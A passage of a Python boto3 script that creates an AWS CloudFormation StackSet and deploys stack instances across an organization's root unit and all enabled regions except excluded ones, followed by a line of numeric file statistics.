PermissionModel='SERVICE_MANAGED',
#AdministrationRoleARN='AWSControlTowerStackSetRole',
#ExecutionRoleName='AWSControlTowerExecution',
AutoDeployment={
'Enabled':True,
'RetainStacksOnAccountRemoval': False
}
)
stack_set_id=response['StackSetId']
print("Stack Set Id is {}".format(stack_set_id))
organizations_client=boto3.client('organizations')
root_id = organizations_client.list_roots()['Roots'][0]['Id']
waiter = Waiter('StackSetOperationComplete', waiter_config, cloudformation_client.describe_stack_set_operation)
ec2_client = boto3.client('ec2')
all_regions = [region['RegionName'] for region in ec2_client.describe_regions()['Regions']]
for region in excluded_regions:
all_regions.remove(region)
response=cloudformation_client.create_stack_instances(
StackSetName=StackSetName,
DeploymentTargets={
'OrganizationalUnitIds':[root_id]
},
Regions=all_regions,
OperationPreferences={
'FailureToleranceCount': 1,
'MaxConcurrentCount': 10
}
)
operation_id=response['OperationId']
print("Create Stack Instances Operation Id is {}".format(operation_id))
waiter.wait(
StackSetName=StackSetName,
OperationId=operation_id
)
| 26.933333 | 196 | 0.726308 | 284 | 2,828 | 7.073944 | 0.443662 | 0.067198 | 0.028372 | 0.058238 | 0.038825 | 0 | 0 | 0 | 0 | 0 | 0 | 0.006582 | 0.140382 | 2,828 | 104 | 197 | 27.192308 | 0.819827 | 0.0343 | 0 | 0.139535 | 0 | 0 | 0.326979 | 0.094941 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.046512 | 0 | 0.046512 | 0.023256 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |